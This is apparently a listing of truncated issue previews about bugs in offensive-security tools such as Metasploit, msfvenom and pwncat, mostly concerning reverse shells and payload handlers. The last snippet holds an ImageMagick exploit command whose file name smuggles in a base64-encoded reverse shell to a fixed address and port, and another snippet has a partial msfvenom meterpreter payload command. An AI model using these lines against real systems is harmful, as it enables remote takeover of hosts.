-
-
Hello
I am trying to use pymetasploit3 library to automate commands in the msfconsole. I have setup a multi handler using meterpreter/reverse_tcp and I am able to receive a reverse meterpreter shel…
-
## Current Behavior
* Crashes when attempting to transfer payload/setting HTTP server (should be vulnerable)
* Same behaviour on Mac OS & Kali Linux
`cmd (MIPSLE Reverse TCP) > run
[*] Using wge…
-
It appears that RC4 encrypted shell payloads built with venom are incompatible with rc4 encrypted handlers in framework? Automated testing suggests this is something across both staged and stageless …
-
### Describe the bug
Can't generate any payload in msfvenom.
### Steps To Reproduce
Steps to reproduce the behavior:
1. `nix-shell -p metasploit`
2. `msfvenom -p windows/x64/meterpreter/reverse…
-
First of all, I wanna say that pwncat is awesome, this tool really impressed me when I discovered it
However this time, I'm using pwncat to listen a jsp reverse shell generated by msfvenom (java/js…
-
make it more like a real tty?
-
When I try to cmd_exec("ls -R */*"), in a python shell it times out and does not provide the full output, however in linux/x86/shell/reverse_tcp it runs fine and provides the full output.
Any idea wh…
-
## Bug Description
After initiating a reverse shell connection, I receive an error and the shell exits.
## pwncat version
OS: Parrot OS
```
──╼ #pwncat --version
pwncat: Version 0.1.1 (https…
-
Key points:
- ImageMagick 6.9.6 exploit info to reverse shell
`cp image.jpg '|smile"echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE4Mi80NDQ0IDA+JjE=|base64 -d|bash".jpg'`
- strace (https://gt…